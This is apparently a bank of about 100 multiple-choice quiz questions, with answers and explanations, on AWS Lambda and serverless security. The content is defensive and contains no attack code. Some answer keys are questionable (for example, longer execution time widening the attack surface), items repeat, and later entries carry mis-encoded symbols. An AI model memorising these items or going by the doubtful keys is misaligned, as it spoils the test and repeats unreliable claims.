1. What is the primary security concern when using serverless functions like AWS Lambda?
A) Excessive compute costs
B) Long execution times
C) Over-privileged IAM roles
D) Lack of internet connectivity
Answer: C) Over-privileged IAM roles
Explanation: Serverless functions should follow the principle of least privilege to limit access only to necessary resources. Over-privileged IAM roles increase security risks.
2. How can you prevent unauthorized invocation of AWS Lambda functions?
A) Use public API Gateway for all Lambda calls
B) Restrict execution to specific VPCs
C) Set IAM policies with least privilege access
D) Allow unauthenticated users for easier access
Answer: C) Set IAM policies with least privilege access
Explanation: Implementing least privilege IAM policies ensures that only authorized identities can invoke the function, reducing unauthorized access risks.
3. Which type of attack can exploit insecure event triggers in a serverless environment?
A) SQL Injection
B) Server-Side Request Forgery (SSRF)
C) Event Injection
D) DNS Spoofing
Answer: C) Event Injection
Explanation: Event injection attacks occur when an attacker manipulates event sources (e.g., SNS, S3, API Gateway) to trigger malicious behavior in serverless functions.
4. What is a recommended practice for securing environment variables in AWS Lambda?
A) Hardcode secrets in the function code
B) Store secrets in a plaintext file inside the function package
C) Use AWS Secrets Manager or Parameter Store
D) Pass secrets via query parameters in the API request
Answer: C) Use AWS Secrets Manager or Parameter Store
Explanation: AWS Secrets Manager or Parameter Store provides a secure way to store and retrieve sensitive data like API keys, instead of hardcoding them.
5. Which security control helps in detecting malicious activity in AWS Lambda?
A) AWS X-Ray
B) AWS IAM
C) AWS Config
D) AWS CloudTrail & Amazon GuardDuty
Answer: D) AWS CloudTrail & Amazon GuardDuty
Explanation: CloudTrail logs API activity, and GuardDuty detects anomalies and potential threats in AWS Lambda functions.
6. What is a potential risk of allowing AWS Lambda functions to run in a public subnet?
A) Increased cost due to internet traffic
B) Exposure to direct external attacks
C) Slow function execution
D) Limited scalability
Answer: B) Exposure to direct external attacks
Explanation: A public subnet allows unrestricted internet access, increasing the risk of external attacks on the Lambda function.
7. What is the purpose of the AWS Lambda execution role?
A) It defines user access to the AWS Console
B) It grants the Lambda function permissions to interact with AWS resources
C) It determines the Lambda function runtime version
D) It manages the memory and CPU limits
Answer: B) It grants the Lambda function permissions to interact with AWS resources
Explanation: The execution role defines what AWS resources a Lambda function can access, following the least privilege principle.
8. Which attack can occur due to improper validation of user input in serverless applications?
A) Cross-Site Scripting (XSS)
B) Remote Code Execution (RCE)
C) API Gateway Bypass
D) Identity Spoofing
Answer: B) Remote Code Execution (RCE)
Explanation: If input validation is weak, attackers may inject malicious code that gets executed in the function, leading to RCE attacks.
9. How can you reduce the impact of Denial-of-Service (DoS) attacks on AWS Lambda?
A) Increase memory allocation for functions
B) Set concurrency limits and rate limiting
C) Allow unrestricted invocation from API Gateway
D) Enable verbose logging for debugging
Answer: B) Set concurrency limits and rate limiting
Explanation: Setting concurrency limits and using rate limiting mechanisms in API Gateway helps mitigate DoS attacks.
10. Which AWS service helps protect AWS Lambda functions from excessive invocation?
A) AWS IAM
B) AWS Shield
C) AWS WAF
D) AWS Lambda Concurrency Controls
Answer: D) AWS Lambda Concurrency Controls
Explanation: Concurrency controls help manage the number of simultaneous function executions, reducing the risk of excessive invocation.
11. What is a common security risk of serverless applications using external dependencies?
A) Increased function execution time
B) Higher storage requirements
C) Vulnerable third-party libraries
D) Longer cold start times
Answer: C) Vulnerable third-party libraries
Explanation: Third-party libraries may contain security vulnerabilities that attackers can exploit.
12. How can you secure a Lambda function handling sensitive user data?
A) Use encrypted environment variables
B) Store data in plain text for easy retrieval
C) Disable IAM authentication for faster access
D) Allow public read/write permissions on logs
Answer: A) Use encrypted environment variables
Explanation: Encrypting environment variables prevents unauthorized access to sensitive data.
13. What is the role of AWS WAF in serverless security?
A) Filtering malicious requests before they reach API Gateway
B) Encrypting data stored in Lambda functions
C) Managing IAM permissions for Lambda
D) Preventing unauthorized SSH access
Answer: A) Filtering malicious requests before they reach API Gateway
Explanation: AWS WAF helps filter SQLi, XSS, and other attacks at the API Gateway level before they reach serverless functions.
14. Which of the following improves the security of AWS Lambda layers?
A) Using only publicly available layers
B) Keeping layers updated with security patches
C) Using hardcoded credentials in layers
D) Disabling encryption on layers
Answer: B) Keeping layers updated with security patches
Explanation: Keeping Lambda layers updated ensures that known vulnerabilities are patched.
15. What is a key risk of deploying AWS Lambda functions in a shared cloud environment?
A) Cross-tenant data leakage
B) High memory usage
C) Slow execution times
D) Higher billing rates
Answer: A) Cross-tenant data leakage
Explanation: Multi-tenancy in cloud environments can lead to cross-tenant data leakage if isolation mechanisms fail.
16. Which logging service can help identify security incidents in AWS Lambda?
A) Amazon CloudWatch
B) AWS CodePipeline
C) AWS CodeDeploy
D) AWS Auto Scaling
Answer: A) Amazon CloudWatch
Explanation: CloudWatch logs Lambda execution data, helping detect anomalies and security incidents.
17. Which security risk is associated with misconfigured CORS in serverless applications?
A) Information Disclosure
B) Memory Leakage
C) High Execution Time
D) CPU Exhaustion
Answer: A) Information Disclosure
Explanation: Misconfigured CORS can allow unauthorized access to sensitive APIs, leading to data exposure.
18. What should be avoided when handling secrets in AWS Lambda?
A) Using environment variables
B) Storing secrets in the function code
C) Encrypting secrets with KMS
D) Using IAM roles for access control
Answer: B) Storing secrets in the function code
Explanation: Never store secrets directly in code, as they could be leaked if the code is exposed.
19. How can you restrict AWS Lambda function access to a specific IP range?
A) Using AWS Shield
B) Configuring API Gateway with an IP whitelist
C) Setting up a Lambda Layer
D) Encrypting the function code
Answer: B) Configuring API Gateway with an IP whitelist
Explanation: API Gateway allows IP-based access control through resource policies, blocking unauthorized IPs from invoking Lambda.
20. What is the best approach to ensure serverless applications are protected against dependency vulnerabilities?
A) Use only open-source libraries
B) Regularly scan dependencies for vulnerabilities
C) Hardcode dependencies in Lambda
D) Avoid updating dependencies for stability
Answer: B) Regularly scan dependencies for vulnerabilities
Explanation: Use tools like AWS CodeGuru, Snyk, or OWASP Dependency-Check to detect vulnerabilities in serverless dependencies.
21. What happens if a Lambda function is exposed to unrestricted public HTTP access?
A) The function execution speed increases
B) It becomes vulnerable to brute-force and API abuse attacks
C) The function’s cost reduces
D) AWS automatically protects it
Answer: B) It becomes vulnerable to brute-force and API abuse attacks
Explanation: Publicly accessible Lambda functions via API Gateway can be targeted for brute-force, DDoS, and API abuse attacks.
22. How can AWS Identity Federation improve Lambda security?
A) By allowing anonymous access
B) By integrating external authentication sources (e.g., SAML, OIDC)
C) By removing IAM permissions
D) By increasing Lambda execution time
Answer: B) By integrating external authentication sources (e.g., SAML, OIDC)
Explanation: AWS Identity Federation allows secure authentication via SAML, OIDC, or Cognito, reducing direct IAM exposure.
23. Which security measure protects AWS Lambda from excessive retries and recursive invocations?
A) Setting Dead Letter Queues (DLQ)
B) Increasing memory allocation
C) Hardcoding function timeouts
D) Using an unscoped IAM role
Answer: A) Setting Dead Letter Queues (DLQ)
Explanation: DLQs help prevent infinite retry loops by capturing failed execution requests instead of triggering them endlessly.
24. What is a key risk of using inline policies for Lambda IAM roles?
A) They cannot be modified after creation
B) They expose credentials to unauthorized users
C) They may grant excessive permissions unintentionally
D) They reduce function execution time
Answer: C) They may grant excessive permissions unintentionally
Explanation: Inline IAM policies are harder to manage and often lack granularity, leading to over-permissioned roles.
25. What should be done to prevent code injection attacks in serverless applications?
A) Use managed runtime environments
B) Enable X-Ray tracing in AWS Lambda
C) Validate and sanitize user input
D) Increase timeout settings
Answer: C) Validate and sanitize user input
Explanation: Unvalidated input can lead to code injection vulnerabilities, such as RCE and SQL injection.
26. How can attackers exploit an overly permissive Lambda IAM role?
A) By triggering a function repeatedly
B) By exfiltrating sensitive data from AWS resources
C) By increasing execution time
D) By modifying the Lambda timeout setting
Answer: B) By exfiltrating sensitive data from AWS resources
Explanation: Overly permissive IAM roles allow attackers to access S3, DynamoDB, or secrets, leading to data breaches.
27. Which AWS service helps prevent unauthorized access to AWS Lambda functions?
A) AWS Shield
B) AWS IAM and Resource Policies
C) AWS Trusted Advisor
D) Amazon Route 53
Answer: B) AWS IAM and Resource Policies
Explanation: IAM policies and resource policies enforce strict access control on who can invoke Lambda functions.
28. What is the recommended way to protect serverless functions from privilege escalation?
A) Avoid assigning IAM policies to Lambda functions
B) Use restrictive IAM roles and follow the least privilege principle
C) Use Lambda to manage IAM roles dynamically
D) Set up unrestricted network access for Lambda
Answer: B) Use restrictive IAM roles and follow the least privilege principle
Explanation: Overly permissive IAM policies allow attackers to escalate privileges and gain unauthorized access.
29. Why is logging sensitive data in AWS Lambda a security risk?
A) Logs may be stored for too long
B) AWS automatically deletes logs
C) Logs are publicly visible by default
D) Logs can be accessed by unauthorized users if misconfigured
Answer: D) Logs can be accessed by unauthorized users if misconfigured
Explanation: Logging secrets, credentials, or PII in CloudWatch can expose sensitive data if permissions are weak.
30. What is a risk of using default execution roles in AWS Lambda?
A) They have unnecessary permissions
B) They improve function security
C) They enhance debugging capabilities
D) They speed up function execution
Answer: A) They have unnecessary permissions
Explanation: Default roles may include permissions beyond what is necessary, violating least privilege principles.
31. Which AWS service helps detect anomalies in Lambda activity?
A) AWS Glue
B) AWS GuardDuty
C) Amazon SNS
D) AWS CodeBuild
Answer: B) AWS GuardDuty
Explanation: GuardDuty detects suspicious activity in AWS Lambda, such as unauthorized API calls and privilege escalation.
32. How can AWS Lambda function execution time impact security?
A) Longer execution time increases attack surface
B) Short execution times make functions insecure
C) Execution time does not affect security
D) AWS automatically limits execution time
Answer: A) Longer execution time increases attack surface
Explanation: Longer execution times can lead to higher attack exposure, especially if attackers attempt brute-force or DoS attacks.
33. How can you protect a Lambda function from unauthorized API Gateway calls?
A) Enable AWS WAF on API Gateway
B) Increase timeout limits
C) Disable IAM authentication
D) Use a publicly accessible VPC
Answer: A) Enable AWS WAF on API Gateway
Explanation: AWS WAF blocks malicious requests before they reach Lambda.
34. What is the impact of improper error handling in AWS Lambda?
A) Sensitive data leakage through error messages
B) Faster function execution
C) Improved user experience
D) Reduced cost
Answer: A) Sensitive data leakage through error messages
Explanation: Detailed error messages can expose stack traces, secrets, and sensitive logic, aiding attackers.
35. How can you protect Lambda functions against replay attacks?
A) Use time-based tokens and nonce values
B) Hardcode function responses
C) Increase function timeout
D) Store API keys in environment variables
Answer: A) Use time-based tokens and nonce values
Explanation: Nonce values and time-based tokens ensure each request is unique, preventing replay attacks.
36. What is a key security best practice for serverless applications handling financial transactions?
A) Enable logging and monitoring
B) Allow unrestricted public access
C) Reduce function memory allocation
D) Increase function concurrency
Answer: A) Enable logging and monitoring
Explanation: Logging and monitoring detect anomalous transactions and potential fraud.
37. What is the best way to prevent excessive permissions when granting Lambda access to an S3 bucket?
A) Grant full S3 access (s3:*) to the function
B) Use fine-grained IAM policies with specific S3 actions
C) Add the Lambda function to the AdministratorAccess policy
D) Store the AWS credentials in environment variables
Answer: B) Use fine-grained IAM policies with specific S3 actions
Explanation: Following least privilege principles, IAM policies should grant only required S3 actions instead of full access.
38. How can you protect an AWS Lambda function from cross-account access?
A) Use AWS Shield Advanced
B) Restrict access with resource-based policies
C) Increase function execution timeout
D) Use a publicly accessible Lambda layer
Answer: B) Restrict access with resource-based policies
Explanation: Resource-based policies can be applied to restrict specific AWS accounts from invoking a Lambda function.
39. What is a security concern of keeping AWS Lambda functions in a public subnet?
A) Increased storage cost
B) More accessible to public internet threats
C) Reduced function execution time
D) Enhanced network performance
Answer: B) More accessible to public internet threats
Explanation: Public subnets expose Lambda functions to direct attacks, increasing risks like SSRF, open database exposure, and malware injection.
40. How can you prevent a Lambda function from accessing resources outside its intended scope?
A) Use a broad IAM policy for flexibility
B) Implement a strict IAM role with minimal permissions
C) Allow all VPC traffic for unrestricted access
D) Store AWS credentials in plaintext
Answer: B) Implement a strict IAM role with minimal permissions
Explanation: Restrictive IAM roles ensure the function can access only necessary AWS resources, reducing the attack surface.
41. What is the risk of using a single execution role across multiple Lambda functions?
A) Increased billing costs
B) Potential privilege escalation across functions
C) Improved function performance
D) Reduced network latency
Answer: B) Potential privilege escalation across functions
Explanation: If multiple functions share the same IAM role, an attacker compromising one function might gain access to unintended resources.
42. Why should you avoid exposing Lambda function URLs directly?
A) They make debugging harder
B) They increase unauthorized access risk
C) AWS automatically blocks direct access
D) They reduce function execution time
Answer: B) They increase unauthorized access risk
Explanation: Directly exposed Lambda URLs can be brute-forced, exploited, or abused, leading to unauthorized API calls.
43. How can you minimize the security risk of long-lived AWS credentials in Lambda?
A) Store credentials inside the function code
B) Use IAM roles with temporary credentials
C) Use plaintext secrets in API Gateway
D) Hardcode access keys inside the function
Answer: B) Use IAM roles with temporary credentials
Explanation: IAM roles provide temporary credentials, preventing long-term exposure of static credentials.
44. How can attackers exploit misconfigured CloudWatch logs in Lambda?
A) By increasing Lambda timeout settings
B) By retrieving sensitive data from log outputs
C) By injecting malicious code into logs
D) By preventing function execution
Answer: B) By retrieving sensitive data from log outputs
Explanation: Misconfigured logs may expose secrets, API keys, and sensitive data, aiding attackers in further exploitation.
45. What is the best way to secure API Gateway endpoints linked to AWS Lambda?
A) Enable AWS WAF for input validation
B) Use public API Gateway routes
C) Allow unrestricted access to API Gateway
D) Store API keys inside the function code
Answer: A) Enable AWS WAF for input validation
Explanation: AWS WAF helps block SQLi, XSS, and other web-based attacks before they reach Lambda.
46. What security risk does an unbounded loop in an AWS Lambda function introduce?
A) Potential Denial of Service (DoS)
B) Reduced function execution cost
C) Improved response time
D) Increased memory allocation
Answer: A) Potential Denial of Service (DoS)
Explanation: Unbounded loops can cause infinite execution, leading to resource exhaustion and higher costs.
47. How can you prevent sensitive data exposure in Lambda responses?
A) Encrypt responses using AWS KMS
B) Store secrets in the function logs
C) Allow unrestricted logging
D) Include full error messages in responses
Answer: A) Encrypt responses using AWS KMS
Explanation: AWS KMS encryption ensures sensitive data is protected before being sent in API responses.
48. Why should you regularly update AWS Lambda dependencies?
A) To improve function runtime performance
B) To patch security vulnerabilities in third-party packages
C) To avoid AWS billing increases
D) To reduce execution time
Answer: B) To patch security vulnerabilities in third-party packages
Explanation: Outdated dependencies can contain known exploits, which attackers can leverage for remote code execution.
49. What is a security benefit of using AWS Lambda layers?
A) It reduces function execution time
B) It allows centralized dependency management and security updates
C) It provides publicly accessible function code
D) It automatically secures runtime environments
Answer: B) It allows centralized dependency management and security updates
Explanation: Lambda layers help manage dependencies separately from function code, allowing easier security patching.
50. How can you prevent API abuse and bot attacks against Lambda functions?
A) Enable rate limiting and authentication mechanisms
B) Store sensitive data in public S3 buckets
C) Allow unrestricted API calls
D) Remove IAM roles for easier access
Answer: A) Enable rate limiting and authentication mechanisms
Explanation: Rate limiting (AWS WAF, API Gateway throttling) and authentication (JWT, OAuth) help prevent abuse and automated attacks.
51. What is the primary purpose of AWS Lambda's execution role?
A) It defines user permissions to access the AWS console
B) It grants the Lambda function necessary permissions to interact with AWS resources
C) It improves the function execution speed
D) It determines the Lambda function memory allocation
Answer: B) It grants the Lambda function necessary permissions to interact with AWS resources
Explanation: The execution role ensures that Lambda has only the required permissions to access AWS services, enforcing the least privilege principle.
52. What is a key security concern when using external APIs in a Lambda function?
A) Increased execution time
B) Insecure API responses leading to data exposure
C) Higher AWS costs
D) Reduced cold start time
Answer: B) Insecure API responses leading to data exposure
Explanation: External APIs may return sensitive data, which, if not properly validated or secured, could be leaked or exploited.
53. Which AWS security feature can be used to encrypt data at rest in AWS Lambda?
A) AWS CloudTrail
B) AWS KMS (Key Management Service)
C) AWS X-Ray
D) AWS IAM
Answer: B) AWS KMS (Key Management Service)
Explanation: AWS KMS enables encryption and decryption of sensitive data, ensuring secure storage and processing.
54. How can attackers exploit insecure environment variables in AWS Lambda?
A) By modifying function execution time
B) By accessing hardcoded secrets or credentials
C) By increasing API response speed
D) By reducing Lambda function concurrency
Answer: B) By accessing hardcoded secrets or credentials
Explanation: Storing unencrypted secrets in environment variables exposes them to attackers, leading to data breaches.
55. How can AWS Config improve security for serverless applications?
A) By tracking configuration changes and detecting misconfigurations
B) By reducing execution time for Lambda functions
C) By increasing function concurrency
D) By blocking all inbound traffic
Answer: A) By tracking configuration changes and detecting misconfigurations
Explanation: AWS Config monitors configuration changes and helps detect non-compliant settings that might expose security risks.
56. What is a common security risk when using an API Gateway with AWS Lambda?
A) Lambda function timeouts
B) Lack of authentication and authorization controls
C) Increased latency
D) Higher AWS billing
Answer: B) Lack of authentication and authorization controls
Explanation: If API Gateway doesn't enforce IAM, OAuth, or API keys, attackers may invoke Lambda functions without authorization.
57. What type of attack can occur if a Lambda function is not validated before processing events from untrusted sources?
A) Cross-Site Scripting (XSS)
B) Event Injection Attack
C) Man-in-the-Middle (MITM)
D) Brute Force
Answer: B) Event Injection Attack
Explanation: Attackers can manipulate event data (SNS, S3, API Gateway) to inject malicious payloads if proper validation isn't performed.
58. How can you limit the number of concurrent executions of an AWS Lambda function?
A) By configuring reserved concurrency limits
B) By enabling verbose logging
C) By disabling IAM authentication
D) By using AWS Secrets Manager
Answer: A) By configuring reserved concurrency limits
Explanation: Reserved concurrency limits protect Lambda from overuse or DoS attacks by restricting simultaneous function executions.
59. What is the recommended method to store API keys in AWS Lambda securely?
A) Store them in plaintext inside the function code
B) Use AWS Secrets Manager or Parameter Store
C) Pass them as query parameters in API requests
D) Hardcode them inside environment variables
Answer: B) Use AWS Secrets Manager or Parameter Store
Explanation: Secrets Manager and Parameter Store securely manage API keys, preventing unauthorized access and leakage.
60. How can improper CORS configuration affect a serverless API?
A) It allows unauthorized cross-origin requests
B) It improves function execution speed
C) It increases API Gateway costs
D) It prevents authentication failures
Answer: A) It allows unauthorized cross-origin requests
Explanation: Misconfigured CORS policies can expose serverless APIs to cross-origin attacks, leading to unauthorized access.
61. Why should IAM policies follow the principle of least privilege for Lambda?
A) To minimize the risk of privilege escalation
B) To improve function execution time
C) To reduce AWS costs
D) To enable unrestricted resource access
Answer: A) To minimize the risk of privilege escalation
Explanation: Restricting IAM permissions ensures that Lambda only accesses required resources, reducing security risks.
62. How can you prevent malicious API requests from reaching AWS Lambda?
A) By enabling AWS WAF
B) By increasing function timeout
C) By allowing unrestricted public API access
D) By storing sensitive data in logs
Answer: A) By enabling AWS WAF
Explanation: AWS WAF filters out malicious traffic, protecting Lambda from SQL injection, XSS, and API abuse attacks.
63. What is a key risk of using a publicly accessible AWS Lambda function URL?
A) Increased execution time
B) Unauthorized access and API abuse
C) Reduced cold start issues
D) Increased function concurrency
Answer: B) Unauthorized access and API abuse
Explanation: Public URLs allow unauthorized users to invoke Lambda functions, increasing the risk of API abuse and attacks.
64. How can attackers exploit insecure S3 triggers in serverless applications?
A) By modifying function execution time
B) By injecting malicious files into S3 events
C) By reducing storage costs
D) By increasing API latency
Answer: B) By injecting malicious files into S3 events
Explanation: Unvalidated S3 triggers can allow attackers to upload malicious payloads, leading to data exfiltration or function compromise.
65. What security measure helps protect Lambda from brute-force attacks?
A) Rate limiting via API Gateway
B) Increasing function memory allocation
C) Removing IAM authentication
D) Allowing unrestricted CORS access
Answer: A) Rate limiting via API Gateway
Explanation: Rate limiting prevents excessive requests that could be part of a brute-force or DoS attack.
66. Why should Lambda function execution logs be properly restricted?
A) To reduce AWS billing costs
B) To prevent sensitive data leakage
C) To improve debugging speed
D) To increase API response time
Answer: B) To prevent sensitive data leakage
Explanation: Improperly configured logs can expose secrets, PII, or API keys, leading to security breaches.
67. What is the risk of not defining timeouts for a Lambda function?
A) Increased risk of resource exhaustion
B) Reduced API Gateway integration
C) Lower execution concurrency
D) AWS will automatically handle long-running functions
Answer: A) Increased risk of resource exhaustion
Explanation: Without timeouts, Lambda functions may run indefinitely, leading to DoS attacks and cost spikes.
68. How can AWS CloudTrail improve Lambda security?
A) By logging API activity and detecting anomalies
B) By increasing function memory
C) By improving execution time
D) By automatically patching vulnerabilities
Answer: A) By logging API activity and detecting anomalies
Explanation: CloudTrail logs AWS API events, helping detect unauthorized access or privilege escalation.
69. What is a key benefit of using Amazon GuardDuty for Lambda security?
A) Detecting threats and suspicious behavior
B) Increasing function execution speed
C) Reducing function cold starts
D) Allowing public API access
Answer: A) Detecting threats and suspicious behavior
Explanation: GuardDuty monitors AWS accounts for malicious activity related to Lambda functions.
70. What should you avoid when handling errors in AWS Lambda?
A) Exposing detailed error messages to users
B) Logging errors for debugging
C) Implementing retry mechanisms
D) Using dead-letter queues
Answer: A) Exposing detailed error messages to users
Explanation: Error messages should not reveal sensitive data, as attackers can use them for information disclosure attacks.
71. Which AWS service can help automate security best practices for AWS Lambda?
A) AWS Trusted Advisor
B) Amazon CloudFront
C) AWS Auto Scaling
D) AWS Lambda Layers
Answer: A) AWS Trusted Advisor
Explanation: AWS Trusted Advisor helps identify security risks in Lambda, such as over-privileged IAM roles and missing security configurations.
72. What is the main security concern when using AWS Lambda with public API Gateway endpoints?
A) Increased AWS costs
B) Unauthorized access and API abuse
C) Faster function execution
D) Lower request latency
Answer: B) Unauthorized access and API abuse
Explanation: Publicly accessible API Gateway endpoints allow attackers to brute-force or exploit the Lambda function.
73. What is a key advantage of using an AWS Lambda authorizer with API Gateway?
A) It provides authentication and authorization before requests reach the Lambda function
B) It increases function execution speed
C) It enables AWS WAF automatically
D) It disables API Gateway logging
Answer: A) It provides authentication and authorization before requests reach the Lambda function
Explanation: Lambda authorizers allow token-based authentication (JWT, OAuth) before API requests are processed by Lambda.
74. How can AWS Lambda functions be protected from excessive retries?
A) Implement exponential backoff in API clients
B) Disable IAM authentication
C) Increase function execution time
D) Allow unrestricted event retries
Answer: A) Implement exponential backoff in API clients
Explanation: Exponential backoff helps prevent API abuse and excessive invocation loops, reducing Lambda execution retries.
75. What is a risk of storing sensitive data in unencrypted environment variables?
A) Unauthorized access if the function is compromised
B) Increased function execution latency
C) Reduced API Gateway logging
D) Slower database queries
Answer: A) Unauthorized access if the function is compromised
Explanation: If attackers gain access to the function, they can extract secrets from environment variables, leading to data breaches.
76. What is a key security feature of AWS Key Management Service (KMS) in Lambda?
A) Secure encryption and decryption of sensitive data
B) Improved function execution time
C) Automated role assignment
D) Enabling public API access
Answer: A) Secure encryption and decryption of sensitive data
Explanation: AWS KMS ensures sensitive data is encrypted and securely retrieved, preventing data leaks.
77. Which AWS feature can be used to detect unusual behavior in AWS Lambda?
A) Amazon GuardDuty
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS X-Ray
Answer: A) Amazon GuardDuty
Explanation: GuardDuty detects suspicious activity in AWS Lambda, such as unauthorized access and privilege escalation.
78. How can you ensure Lambda functions execute only from specific AWS accounts?
A) Use resource-based policies to allow only specific AWS account IDs
B) Increase function execution memory
C) Reduce function concurrency
D) Store AWS credentials in plaintext
Answer: A) Use resource-based policies to allow only specific AWS account IDs
Explanation: Resource-based policies restrict which AWS accounts can invoke a Lambda function, preventing unauthorized access.
79. What is a recommended security measure when using third-party dependencies in AWS Lambda?
A) Regularly scan dependencies for vulnerabilities
B) Store dependencies in plaintext files
C) Hardcode dependencies in the function
D) Allow all dependencies without verification
Answer: A) Regularly scan dependencies for vulnerabilities
Explanation: Dependency scanning detects security vulnerabilities in third-party packages, preventing potential exploits.
80. How can AWS Lambda functions be protected from API scraping attacks?
A) Enable rate limiting in API Gateway
B) Disable IAM authentication
C) Store API responses in logs
D) Allow unrestricted public API access
β
Answer: A) Enable rate limiting in API Gateway
π Explanation: Rate limiting prevents API scraping and abuse, blocking excessive requests from bots or attackers.
81. What should be avoided when configuring AWS Lambda logging?
A) Logging sensitive data such as API keys
B) Enabling CloudWatch Logs for monitoring
C) Using structured logs for debugging
D) Implementing log retention policies
β
Answer: A) Logging sensitive data such as API keys
π Explanation: Logging secrets, API keys, or PII increases the risk of data leaks if logs are compromised.
82. What is the impact of allowing unrestricted network access to AWS Lambda?
A) Increased exposure to external threats
B) Faster function execution
C) Lower AWS billing
D) Improved API Gateway performance
β
Answer: A) Increased exposure to external threats
π Explanation: A function with unrestricted egress becomes a pivot: an attacker who gains code execution or an SSRF primitive inside it can reach internal services, scan the VPC, or exfiltrate data to arbitrary endpoints. Note that a function not attached to a VPC has unrestricted internet egress by default.
83. What is a best practice for securing AWS Lambda function permissions?
A) Assign the function the least privilege IAM role
B) Use the AWS AdministratorAccess policy
C) Allow full access to all AWS resources
D) Store IAM credentials in the function code
β
Answer: A) Assign the function the least privilege IAM role
π Explanation: Least privilege IAM roles reduce security risks by granting only necessary permissions.
84. What is a risk of not setting concurrency limits on AWS Lambda?
A) Functions may consume excessive AWS resources
B) Lambda functions execute faster
C) Reduced API Gateway latency
D) Lower execution costs
β
Answer: A) Functions may consume excessive AWS resources
π Explanation: Unlimited concurrency can lead to resource exhaustion, increasing costs and enabling Denial-of-Service (DoS) attacks.
85. How can you prevent unauthorized external API calls in AWS Lambda?
A) Restrict outbound network traffic using VPC security groups
B) Increase function execution time
C) Allow unrestricted API Gateway access
D) Store API keys in function logs
β
Answer: A) Restrict outbound network traffic using VPC security groups
π Explanation: Security groups attached to a VPC-enabled function allow egress only to the CIDRs, prefix lists or other security groups you list, so a compromised function cannot reach arbitrary endpoints. This works only when the function is attached to a VPC; a function outside a VPC has unrestricted outbound access, so place it in private subnets and route any required internet access through a NAT gateway or VPC endpoints.
86. What security risk arises from using hardcoded API keys in Lambda functions?
A) Keys may be leaked if the code is exposed
B) Improved function execution time
C) Reduced AWS billing
D) Increased IAM security
β
Answer: A) Keys may be leaked if the code is exposed
π Explanation: Hardcoded API keys can be exposed in code repositories or logs, leading to unauthorized API access.
87. How does AWS WAF help protect AWS Lambda functions?
A) By filtering malicious requests before they reach API Gateway
B) By increasing Lambda execution speed
C) By improving IAM role management
D) By automatically enabling public API access
β
Answer: A) By filtering malicious requests before they reach API Gateway
π Explanation: AWS WAF blocks SQL injection, XSS, and API abuse attacks, protecting Lambda from malicious traffic.
88. What is a potential impact of enabling debug logging in AWS Lambda production environments?
A) Exposure of sensitive information
B) Reduced function execution latency
C) Faster debugging and error resolution
D) Improved IAM security
β
Answer: A) Exposure of sensitive information
π Explanation: Debug logs may contain sensitive data, which attackers can exploit for information disclosure.
89. How can you prevent attackers from modifying AWS Lambda configurations?
A) Enable AWS IAM role-based access control (RBAC)
B) Allow all users to edit function settings
C) Store AWS credentials inside the function
D) Increase function execution timeout
β
Answer: A) Enable AWS IAM role-based access control (RBAC)
π Explanation: Scope the permissions that change a function (lambda:UpdateFunctionCode, lambda:UpdateFunctionConfiguration, lambda:AddPermission, lambda:CreateFunctionUrlConfig) to a dedicated deployment role and keep human users out of it; anyone who can change the code or the execution role effectively owns everything the function can reach.
90. How can AWS CloudTrail enhance security in serverless applications?
A) By logging all API activity for audit and compliance
B) By reducing function cold starts
C) By increasing IAM permissions
D) By improving function concurrency
β
Answer: A) By logging all API activity for audit and compliance
π Explanation: CloudTrail logs help detect unauthorized access, privilege escalation, and security incidents.
91. What is the primary risk of using publicly accessible Lambda function URLs?
A) Increased response time
B) Unauthenticated invocation leading to abuse
C) Lower AWS billing
D) Improved debugging capabilities
β
Answer: B) Unauthenticated invocation leading to abuse
π Explanation: A function URL created with AuthType NONE is reachable by anyone on the internet (its resource policy must grant lambda:InvokeFunctionUrl to "*" for that to work), so it can be brute-forced, abused as a free API, or hammered to exhaust concurrency and run up cost. Use AuthType AWS_IAM, or put the function behind API Gateway with an authorizer and throttling, unless the endpoint is intentionally public and rate-limited.
92. How can AWS Lambda functions be protected from API gateway injection attacks?
A) Enable AWS WAF with input validation rules
B) Increase function memory allocation
C) Disable IAM authentication
D) Allow unrestricted API access
β
Answer: A) Enable AWS WAF with input validation rules
π Explanation: AWS WAF blocks malicious API input, preventing injection attacks (SQLi, XSS, and command injection).
93. What security risk arises from unrestricted cross-account access to AWS Lambda functions?
A) Unauthorized access and privilege escalation
B) Lower function execution time
C) Reduced logging visibility
D) Increased API response speed
β
Answer: A) Unauthorized access and privilege escalation
π Explanation: Cross-account access should be restricted to prevent external AWS accounts from modifying or invoking Lambda functions.
94. Which AWS security service helps detect anomalous behavior in AWS Lambda?
A) AWS GuardDuty
B) AWS CloudFront
C) AWS Auto Scaling
D) AWS Route 53
β
Answer: A) AWS GuardDuty
π Explanation: GuardDuty detects unusual behavior, such as unexpected API calls and privilege escalation attempts.
95. How can you protect AWS Lambda against privilege escalation attacks?
A) Apply strict IAM policies with the least privilege principle
B) Grant full AdministratorAccess to Lambda functions
C) Disable CloudTrail logging
D) Allow unrestricted VPC access
β
Answer: A) Apply strict IAM policies with the least privilege principle
π Explanation: Restrictive IAM policies ensure that Lambda functions don't have excessive permissions that attackers can exploit.
96. What is the role of API Gateway in securing AWS Lambda functions?
A) It filters and authenticates incoming requests before they reach Lambda
B) It speeds up function execution
C) It enables unrestricted public access
D) It increases Lambda execution time
β
Answer: A) It filters and authenticates incoming requests before they reach Lambda
π Explanation: API Gateway helps validate, authenticate, and filter requests, preventing direct attacks on AWS Lambda.
97. How can AWS CloudWatch Logs enhance Lambda security?
A) By tracking function execution logs and detecting anomalies
B) By reducing function execution time
C) By increasing IAM permissions
D) By disabling API Gateway logging
β
Answer: A) By tracking function execution logs and detecting anomalies
π Explanation: CloudWatch Logs help detect unusual activity, errors, or unauthorized access attempts in Lambda functions.
98. What security risk does an unpatched AWS Lambda function pose?
A) Exposure to known vulnerabilities and exploits
B) Lower function execution costs
C) Faster API response time
D) Reduced memory consumption
β
Answer: A) Exposure to known vulnerabilities and exploits
π Explanation: AWS patches the managed runtimes themselves, but a function pinned to a deprecated runtime no longer receives security updates, and third-party dependencies bundled in the deployment package or in layers are patched only when you rebuild and redeploy them; either case leaves the function exposed to publicly known vulnerabilities.
99. What is a security benefit of using AWS Lambda layers?
A) It allows centralized dependency management and updates
B) It speeds up function execution
C) It removes the need for IAM permissions
D) It eliminates the risk of DoS attacks
β
Answer: A) It allows centralized dependency management and updates
π Explanation: Lambda layers help manage dependencies separately, ensuring easier updates and vulnerability fixes.
100. How can you limit the risk of unauthorized AWS Lambda invocations?
